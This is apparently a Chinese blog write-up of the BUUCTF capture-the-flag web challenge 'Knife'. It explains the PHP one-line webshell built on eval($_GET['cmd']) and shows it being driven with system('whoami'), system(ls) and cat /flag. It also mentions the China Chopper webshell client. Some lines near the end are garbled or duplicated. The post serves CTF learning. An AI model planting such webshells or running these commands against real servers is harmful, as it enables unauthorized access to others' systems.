BUUCTF-Web-签到-[极客大挑战 2019]Knife 1

本文解析了BUUCTF平台的签到题,涉及PHP一句话木马的利用,展示了如何通过eval函数执行系统命令,通过HTML隐藏实现命令回显,最终寻找并获取flag。学习了如何构造恶意代码并通过POST方法绕过安全检查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF-Web-Sql注入-

题目链接:BUUCTF
类型:签到题
知识点: php一句话木马(eval函数


解题过程

这道题目属于签到题,解题之前先来了解一下php一句话木马,最基础的一句话木马由eval()内置变量$_POST/$_GET组成,eval()函数用于将字符串转换为php代码执行,而内置变量 P O S T 和 _POST和 POST_GET存放用户请求参数,恶意用户通过将一句话木马文件上传到网页目录中,然后访问此文件构造恶意的php代码实现目标机器的增删改查,可以做一个小实验

  • mm.php
<?php
eval($_GET['cmd']);
?>

放在本地web目录下访问mm.php页面,因为是GET传参所以直接通过url将php代码传入到网页变量cmd中,如下

  • ?cmd=echo 123

    当然也可以传入system()等执行系统命令函数
  • ?cmd=system('whoami');

再回到原来的题目,根据页面回显猜测可能存在一句话木马,构造恶意代码通过POST方法传入到网页变量Syc

  • Syc=system(ls);

    这边要注意网页有一个html隐写,通过Ctrl+a或者F12查看源代码就可以看到执行命令的回显了


    最后在根目录下找到flag,直接使用cat得到flag
  • cat /flag

    除此之外还可以用中国菜刀连接来得到flag
    64957)]
    除此之外还可以用中国菜刀连接来得到flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值